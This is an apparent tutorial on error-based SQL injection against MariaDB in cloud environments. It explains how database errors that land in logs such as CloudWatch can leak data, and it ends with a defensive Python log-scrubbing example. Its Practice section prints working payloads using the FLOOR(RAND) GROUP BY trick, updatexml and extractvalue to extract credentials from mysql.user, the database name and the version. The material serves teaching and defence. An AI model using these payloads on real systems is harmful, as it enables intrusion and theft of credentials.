Error-Based Attacks in Cloud

Context

This article explores how error-based SQL injection attacks against MariaDB work in cloud environments. The primary goal is to illustrate the techniques for extracting sensitive data from database error messages in the cloud. It assumes familiarity with cloud infrastructure, SQL error handling, and cloud logging mechanisms, as well as previous experience with MariaDB SQL injection.

Theory

Error Message Leak in Cloud Environments

Error-based SQL injection is a technique that exploits the messages returned by a database to extract data. In cloud environments, such error messages could inadvertently be exposed in logs, providing valuable information to an attacker. The key to this approach is injecting SQL payloads designed to trigger errors and subsequently examining these error messages to gather data.

Attack Sequence

  1. Inject a carefully crafted SQL payload.
  2. Trigger database errors that concatenate or display internal data.
  3. Capture and examine the error messages to extract useful information.

Cloud Logs Exfiltration

Cloud logging services, such as AWS CloudWatch, often store detailed logs of error messages. These logs can contain sensitive data when database errors occur. An important attack method involves accessing these logs to retrieve any data leaks that have been inadvertently stored.

Data Flow

  • User interacts with the web application.
  • The application triggers an SQL error.
  • The error message gets logged by the cloud service.
  • The attacker retrieves these logs to extract sensitive information.

Attack Sequence

  1. Trigger SQL errors to generate detailed error messages.
  2. Access cloud-based logs where these messages are stored.
  3. Analyze the logs for sensitive information leakage.

MariaDB Error Handling in Cloud

MariaDB error messages are not always sanitized before they are returned or logged, which can lead to data leaks. Such SQL errors can reveal parts of the database structure, including table names, column names, and even the data stored within.

Cloud Logging Vulnerabilities

Cloud logging services often assume their logs are secure and inaccessible to unauthorized users. However, if these logs are misconfigured or improperly secured, they can become a vector for information disclosure attacks. The potential exposure of sensitive data in cloud logs represents a significant vulnerability.

Practice

Exploiting Error-Based SQL Injection in MariaDB on Cloud

  1. Triggering User Credentials Leak

    • Inject the following SQL payload into an application input:
    SELECT * FROM users WHERE id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(user,0x7e,password) FROM mysql.user LIMIT 0,1)),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a);
    
    • This payload triggers an error designed to leak the user credentials from the 'mysql.user' table.
  2. Extracting Database Name

    • Use updatexml function to cause an error:
    SELECT updatexml(null,concat(0x3a,(SELECT database())),null);
    
    • The database name is revealed through the error message caused by this injection.
  3. Extracting Database Version

    • Use extractvalue function:
    SELECT extractvalue(rand(),concat(0x3a,(SELECT version())));
    
    • This payload causes a database error that reveals the database version.
  4. Searching for Leaked Data in Cloud Logs

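    • Access the cloud logs and search for error messages containing leaked data (the query below is schematic; cloudwatch_logs stands in for wherever the log events can be queried):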
    SELECT * FROM cloudwatch_logs WHERE message LIKE '%error%';
    
    • Review the stored error messages for any sensitive information that has been logged.

These steps can lead to the extraction of sensitive data from error messages that are logged in cloud environments, demonstrating how an attacker can exploit inadequate error handling and logging practices.
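From the defensive side, the leak path above closes when database error text is scrubbed before it is shipped to the cloud log store. The following is an added example, not part of the original article: the names scrub and DbErrorScrubber, the two regular expressions, and the sample log lines are assumptions constructed for illustration.

```python
import logging
import re

# MariaDB error texts produced by the payload families above (patterns are
# this example's assumption): updatexml/extractvalue raise "XPATH syntax
# error", the GROUP BY/RAND trick raises "Duplicate entry".
LEAK_PATTERNS = [
    ("xpath", re.compile(r"(XPATH syntax error: ')(.*)(')")),
    ("dup_entry", re.compile(r"(Duplicate entry ')(.*)(' for key)")),
]

def scrub(message):
    """Mask the value echoed inside a DB error; return (clean, findings)."""
    findings = []
    for name, pattern in LEAK_PATTERNS:
        message, hits = pattern.subn(r"\1[REDACTED]\3", message)
        if hits:
            findings.append(name)
    return message, findings

class DbErrorScrubber(logging.Filter):
    """Attach to the handler that ships logs off-host (e.g. to CloudWatch)."""
    def filter(self, record):
        clean, findings = scrub(record.getMessage())
        if findings:
            record.msg, record.args = clean, ()
            # "Duplicate entry" also occurs on ordinary unique-key conflicts,
            # so this is a signal for review, not proof of injection.
            record.sqli_suspect = findings
        return True

# Constructed sample log lines, not captured from a real system.
SAMPLE_LINES = [
    "GET /health 200",
    "query failed: (1105, \"XPATH syntax error: ':shopdb'\")",
    "query failed: (1062, \"Duplicate entry 'appuser~EXAMPLEHASH1' for key 'group_key'\")",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        clean, findings = scrub(line)
        print(findings or "-", clean)
```

Records that carry the sqli_suspect attribute can be routed to an alert, while the redacted message is what reaches the log store.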

Tools

  • SQLMap
  • Burp Suite
  • AWS CloudWatch
